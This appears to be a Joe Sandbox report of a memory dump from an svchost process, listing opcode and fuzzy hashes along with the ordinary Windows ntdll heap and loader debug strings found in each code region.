                                                          • Opcode ID: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                                          • Instruction ID: 1d1a713801701c58b7fb724b231d1dd4a520da7f9ed6cb0412308eb216dc7ddf
                                                          • Opcode Fuzzy Hash: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                                          • Instruction Fuzzy Hash: B9E2BF74E006158FDB29CF69C591BAAFBF1FF49304F188199D849AB385DB34A846CF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                                          • Instruction ID: a74868723c90a63a18362ad2b71d5765b5d400c7e71879abf08eced96c4aa607
                                                          • Opcode Fuzzy Hash: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                                          • Instruction Fuzzy Hash: 25C18774508386DFDB10CF98C144B6AB7E8BF86704F04896AF8D68B351E334C94ADB66
                                                          Strings
                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 036955AE
                                                          • HEAP[%wZ]: , xrefs: 036954D1, 03695592
                                                          • HEAP: , xrefs: 036954E0, 036955A1
                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 036954ED
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                          • API String ID: 0-1657114761
                                                          • Opcode ID: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                                          • Instruction ID: a117a49997abac40d68902d0d6b1d5ca18416cb40009dac25e4bbfbc41b1a832
                                                          • Opcode Fuzzy Hash: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                                          • Instruction Fuzzy Hash: 81A1F134A04625DFDB24DF28C940BBAFBE5EF46300F18856ED6968B782D774A845CB90
                                                          Strings
                                                          • SXS: %s() passed the empty activation context, xrefs: 036A21DE
                                                          • .Local, xrefs: 036628D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 036A21D9, 036A22B1
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 036A22B6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                                          • Instruction ID: 905c521ab44aaf4e7a28f89affa1539bfd952b7c7fe505270f7eeb2590cbdd8d
                                                          • Opcode Fuzzy Hash: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                                          • Instruction Fuzzy Hash: 5CA1C135940229DFCB24CF69CD98BA9B3B4BF58354F1849E9D848AB351D7309E81CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                          • API String ID: 0-2586055223
                                                          • Opcode ID: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
                                                          • Instruction ID: e59a4751c5b4f8068db8e06b5ea877ea1a48c0706b3d4060e7ba87b01280271c
                                                          • Opcode Fuzzy Hash: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
                                                          • Instruction Fuzzy Hash: F7612436205B809FD721EB24CA44F67BBE8EF84714F190968F9558F391C735D845CB62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                          • API String ID: 0-336120773
                                                          • Opcode ID: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                                          • Instruction ID: 426c4992b92e84d5824b540b06da6231e40f444e516b3efabb0d2fdf3307024e
                                                          • Opcode Fuzzy Hash: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                                          • Instruction Fuzzy Hash: B5310E35601610EFC711DBA8CC86F6BB7E8EF0B620F190049E412CF291D670ED88EA6D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                          • API String ID: 0-1391187441
                                                          • Opcode ID: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                                          • Instruction ID: 27b0681d14de7ffb4b75c89c2ab5c4fb49db492c8740b71d886c934b95bbfd05
                                                          • Opcode Fuzzy Hash: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                                          • Instruction Fuzzy Hash: 9531A236A00614AFCB11EB46C889F9EBFF8EF45B20F154165E915AB291D7B0E940CE64
                                                          Strings
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0364327D
                                                          • HEAP[%wZ]: , xrefs: 03643255
                                                          • HEAP: , xrefs: 03643264
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: 5ee53b4f3f707573a1824395466f2a37f8394fd89810dd3af2c55cb56377896e
                                                          • Instruction ID: e551bf6252910c8f41355ebfbe537fcdedde3e79d5fb30c6ea545229045044a0
                                                          • Opcode Fuzzy Hash: 5ee53b4f3f707573a1824395466f2a37f8394fd89810dd3af2c55cb56377896e
                                                          • Instruction Fuzzy Hash: A392CB74E042489FDB25CF68C5547AEBBF1FF09300F2884A9E899AB391D735A942CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                                          • Instruction ID: 2b87858562040dfd1f8efb95449a41afca5c3133cba8ea5a978de2e7be60714c
                                                          • Opcode Fuzzy Hash: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                                          • Instruction Fuzzy Hash: F622EC70A007019FEB16DF28C594B7AFBF9EF06704F28849AE5568B382D771D882CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: c1320e1edd664823f12b0afff66126897848364d4b19cc6c3f51724909ef3457
                                                          • Instruction ID: 14a6f40c8041341f98794048de3da69845a80a78d8b27170264774c1cda76ffc
                                                          • Opcode Fuzzy Hash: c1320e1edd664823f12b0afff66126897848364d4b19cc6c3f51724909ef3457
                                                          • Instruction Fuzzy Hash: 07F1BD34B00615DFEB15CF68CA94B6AF7B9FF45304F1881A9E6169B381D734E982CB90
                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03631728
                                                          • HEAP[%wZ]: , xrefs: 03631712
                                                          • HEAP: , xrefs: 03631596
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: d5381806d43d19562c1d1c57f69b291ed02a2a2518e180126918b30916624762
                                                          • Instruction ID: 734c78e95ef54f98aa5f9b9c68c791cf17a07c7ee95aeb692af50f1e7bf25f1e
                                                          • Opcode Fuzzy Hash: d5381806d43d19562c1d1c57f69b291ed02a2a2518e180126918b30916624762
                                                          • Instruction Fuzzy Hash: 08E11F70A046419FDB28EF68C485BBABBF5EF4B310F18855DE4968B342E734E941CB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                          • API String ID: 0-1145731471
                                                          • Opcode ID: 962f23e4631cf13195801c3874ea54efabf73ca1a309c03576b347be8fa62831
                                                          • Instruction ID: 4d3635842fa835983afbde0054c7871ca6b72992b32a5e3b0982e684ff6a2a74
                                                          • Opcode Fuzzy Hash: 962f23e4631cf13195801c3874ea54efabf73ca1a309c03576b347be8fa62831
                                                          • Instruction Fuzzy Hash: 33B17D79A046049BDF25CF69CA80BAEB7BAFF45714F28456AE451EB380D730E841CB54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $@
                                                          • API String ID: 0-1077428164
                                                          • Opcode ID: 6eaac94c2d86865941c000d8e2cf0fb9b7a610240f0be2dc341e524717fb7e0f
                                                          • Instruction ID: 67d83b3aafe9440b28b48d9e8b053f5d2580256cd11e85f7bc82b7c2f3cab76b
                                                          • Opcode Fuzzy Hash: 6eaac94c2d86865941c000d8e2cf0fb9b7a610240f0be2dc341e524717fb7e0f
                                                          • Instruction Fuzzy Hash: 63C26F716083419FEB25CF24C981BABBBE9AF88754F08896EF989C7340D734D805CB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: 44640b5790a54bcd1a445ac6e01eeda066765daef696c89f33b6bf6c1cfdeedd
                                                          • Instruction ID: b127d04e308e54e1e1d1517372de0b1c43529b133f3e8ea653b882cdbd0854b2
                                                          • Opcode Fuzzy Hash: 44640b5790a54bcd1a445ac6e01eeda066765daef696c89f33b6bf6c1cfdeedd
                                                          • Instruction Fuzzy Hash: 17A1AE759116289BDB31EF64CC88BEAF7B8EF48700F1401E9E909A7250D7359E85CF64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                          • API String ID: 0-318774311
                                                          • Opcode ID: 0aa7a9c2a0f2e9d52c4d0235ee905ae8f37854a63c46aaa244c036ded61b4868
                                                          • Instruction ID: 7e3ddfb15f758bfb57fe84025e1f13cf8b8262dfa62131c6d5f1621e9372199b
                                                          • Opcode Fuzzy Hash: 0aa7a9c2a0f2e9d52c4d0235ee905ae8f37854a63c46aaa244c036ded61b4868
                                                          • Instruction Fuzzy Hash: 2381AD79619380AFE311DF14C944B6AB7E8FF85750F28892DF9809B390E778D904CB66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$&$@
                                                          • API String ID: 0-1537733988
                                                          • Opcode ID: 3d9acb8db45a08a742aa0d550ee2a1bb4cd6f3b75c444a2991670da462a2c339
                                                          • Instruction ID: 2a2ccd1cfe23d223016cc74ba0c8c4b6504665c8401736f8c002467b0c59ddd2
                                                          • Opcode Fuzzy Hash: 3d9acb8db45a08a742aa0d550ee2a1bb4cd6f3b75c444a2991670da462a2c339
                                                          • Instruction Fuzzy Hash: C871C1745087419FC714DF24C680A2BFBE9BF86758F14891DE8979B351C731D80ACB9A
                                                          Strings
                                                          • TargetNtPath, xrefs: 0370B82F
                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0370B82A
                                                          • GlobalizationUserSettings, xrefs: 0370B834
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                          • API String ID: 0-505981995
                                                          • Opcode ID: 3aaecf7e29bfde992202e6634c291bbe80133b10295fe86411ef0b49e38445ae
                                                          • Instruction ID: 19108d0a0309964dab8fc0c3a7c00fbdcbb10abc091f9bfb249c985efe4116cf
                                                          • Opcode Fuzzy Hash: 3aaecf7e29bfde992202e6634c291bbe80133b10295fe86411ef0b49e38445ae
                                                          • Instruction Fuzzy Hash: 33616F76D51229EBDB31EB54CC88B9AB7F8AB14714F0101E9A509AB290C774DF80CF94
                                                          Strings
                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0368E6C6
                                                          • HEAP[%wZ]: , xrefs: 0368E6A6
                                                          • HEAP: , xrefs: 0368E6B3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                          • API String ID: 0-1340214556
                                                          • Opcode ID: 5d138329f920074bbfe733780eff2e338b6ee6c556b30b7cb89b49d3e7b8d0ef
                                                          • Instruction ID: a5376a3c1406178c61ae6691815ea3a972ce3b418ff9257a37480d5e1cf23467
                                                          • Opcode Fuzzy Hash: 5d138329f920074bbfe733780eff2e338b6ee6c556b30b7cb89b49d3e7b8d0ef
                                                          • Instruction Fuzzy Hash: CB51F335604B54EFD712EBA8C944BAAFBF8EF05300F0941A4E9418F792D779E951CB21
                                                          Strings
                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 036DDC32
                                                          • HEAP[%wZ]: , xrefs: 036DDC12
                                                          • HEAP: , xrefs: 036DDC1F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                          • API String ID: 0-3815128232
                                                          • Opcode ID: 233070c64f5e25b08a90af233305c3895cebe0f3965d3a129b616b14f4fa89de
                                                          • Instruction ID: e2e0cad41338870372b423a029cc99a66a253ce9193bc407400493f2810ebf9e
                                                          • Opcode Fuzzy Hash: 233070c64f5e25b08a90af233305c3895cebe0f3965d3a129b616b14f4fa89de
                                                          • Instruction Fuzzy Hash: C55138B5A046508ED374FB2AC944772B7F5DF46248F09888EE4D28B285D2B5D843DB61
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 036A82DE
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 036A82E8
                                                          • Failed to reallocate the system dirs string !, xrefs: 036A82D7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: 2b4500b0e1f66675598eed332122eb3a1364315c68c10e075157fb52747f53fe
                                                          • Instruction ID: b360cf84716fd48b47fa1f1ea973f7cffda89a53c94513d7bb956deb83898c0b
                                                          • Opcode Fuzzy Hash: 2b4500b0e1f66675598eed332122eb3a1364315c68c10e075157fb52747f53fe
                                                          • Instruction Fuzzy Hash: C741D2B5644710ABC720FB68D944B5BBBE8EF49750F08892EF988DB350E774E8108B95
                                                          Strings
                                                          • PreferredUILanguages, xrefs: 036EC212
                                                          • @, xrefs: 036EC1F1
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 036EC1C5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: d4de884c9876da6b4354e5e09cb4958300c13a97d461e9c7b3fb92f01925704f
                                                          • Instruction ID: 16b1770528690e25bf75558f5efef2665a49f11f4e129dd5f3fcf586549cc995
                                                          • Opcode Fuzzy Hash: d4de884c9876da6b4354e5e09cb4958300c13a97d461e9c7b3fb92f01925704f
                                                          • Instruction Fuzzy Hash: 64418076E01219EFDB11DBD4C991FEEB7B8AB04700F14406AEA05B7290D7749A48CB58
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: 3b50ed8a2ea0ce7282ea76b6fc8ee0a812a7af163318e186c43a71546eb4ef8e
                                                          • Instruction ID: d94733950ffe19fb7b61f30551103cbb0a40077397c0b82cb9caa2f4cc4d33ec
                                                          • Opcode Fuzzy Hash: 3b50ed8a2ea0ce7282ea76b6fc8ee0a812a7af163318e186c43a71546eb4ef8e
                                                          • Instruction Fuzzy Hash: 4E41E275910388CBEB23DBA6C960BBDBBB8EF55340F28045DD841EF791DA398901CB14
                                                          Strings
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 036B4888
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 036B4899
                                                          • LdrpCheckRedirection, xrefs: 036B488F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: 47e162de139afe3140592014bf4b268a9a1b2c2432c332b13ff1702cd8560791
                                                          • Instruction ID: 6ded236eca08a572a5f2b8fc5a4ac22cc2535a90e5a0c99886313ba69f5eb555
                                                          • Opcode Fuzzy Hash: 47e162de139afe3140592014bf4b268a9a1b2c2432c332b13ff1702cd8560791
                                                          • Instruction Fuzzy Hash: 3141D732A007509FCB22CE6AD944AA6BBF9EF49650F09056DEC59DB353DB30D880CF91
                                                          Strings
                                                          • SXS: %s() passed the empty activation context data, xrefs: 036A29FE
                                                          • Actx , xrefs: 036633AC
                                                          • RtlCreateActivationContext, xrefs: 036A29F9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                          • API String ID: 0-859632880
                                                          • Opcode ID: 51373ccda66aa8f280aff8351b7eec90434d4e731b6229602dededce9e453326
                                                          • Instruction ID: 72cdb6ae428f45c4bed7370226165ab3b6c4fe25471c16fbf783fbcb92778904
                                                          • Opcode Fuzzy Hash: 51373ccda66aa8f280aff8351b7eec90434d4e731b6229602dededce9e453326
                                                          • Instruction Fuzzy Hash: 293144366403019FDB26DE58C990B9AB7A4BF44750F288469EE059F3A2CB70DC41CBA0
                                                          Strings
                                                          • DLL "%wZ" has TLS information at %p, xrefs: 036A1A40
                                                          • LdrpInitializeTls, xrefs: 036A1A47
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 036A1A51
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-931879808
                                                          • Opcode ID: 28c13e21bc57232204b2a05fc0144cec4ab7ce77b6a2b3488ef7cae3a2c851cf
                                                          • Instruction ID: 36935fc0e9a02787b3bea93ff2d28eb9fc2d26be417a951e71a556c775132e61
                                                          • Opcode Fuzzy Hash: 28c13e21bc57232204b2a05fc0144cec4ab7ce77b6a2b3488ef7cae3a2c851cf
                                                          • Instruction Fuzzy Hash: F9312835A00205ABEB20DB58C985F7AB6BCFB537A4F08446DE505FB280E7B4AE558790
                                                          Strings
                                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0367127B
                                                          • @, xrefs: 036712A5
                                                          • BuildLabEx, xrefs: 0367130F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 0-3051831665
                                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                          • Instruction ID: 4fd8307c7188cca98d1c06d6c092a7e7207332b4a941d40c4c93114e25f6681b
                                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                          • Instruction Fuzzy Hash: E131D17690061CAFCB11EFA5CC44EEEBBBDEB85720F50442AE915AB260E730DE05CB54
                                                          Strings
                                                          • Process initialization failed with status 0x%08lx, xrefs: 036B20F3
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 036B2104
                                                          • LdrpInitializationFailure, xrefs: 036B20FA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          • Opcode ID: e8b3e3e79338b02f87d36a5d5dc13f48748e430264bbde7ff24d847d1943a523
                                                          • Instruction ID: 0a4142e7039449d8c5900139c798d5195d42f4a2dcdf50c3be5e8e353acffa7e
                                                          • Opcode Fuzzy Hash: e8b3e3e79338b02f87d36a5d5dc13f48748e430264bbde7ff24d847d1943a523
                                                          • Instruction Fuzzy Hash: C1F0FF34640308AFEA24EA4CCD62F9A7BA8EB40B14F080858F7006B281D2E4A9908A90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          • Opcode ID: 7343084effd2247b57d44dfc95ffa13bf232f305c97d3e47e988d96fa3b3bc15
                                                          • Instruction ID: 214483f5722da649fb4074724e93516d4d52ecaf632acc76270ae9f323894c15
                                                          • Opcode Fuzzy Hash: 7343084effd2247b57d44dfc95ffa13bf232f305c97d3e47e988d96fa3b3bc15
                                                          • Instruction Fuzzy Hash: DD714975E00249DFDB01DFA9D990BAEB7B8AF08304F154069E905AB351EB34ED41CB65
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: kLsE
                                                          • API String ID: 3446177414-3058123920
                                                          • Opcode ID: 27b7865bd071bd89595841fcebaa55175b416f99aa41f8a518e06fbcdd8b8374
                                                          • Instruction ID: d82621cd518209afc43787bbdbc7af76903f94be15bbeefd24b72865a1c233f5
                                                          • Opcode Fuzzy Hash: 27b7865bd071bd89595841fcebaa55175b416f99aa41f8a518e06fbcdd8b8374
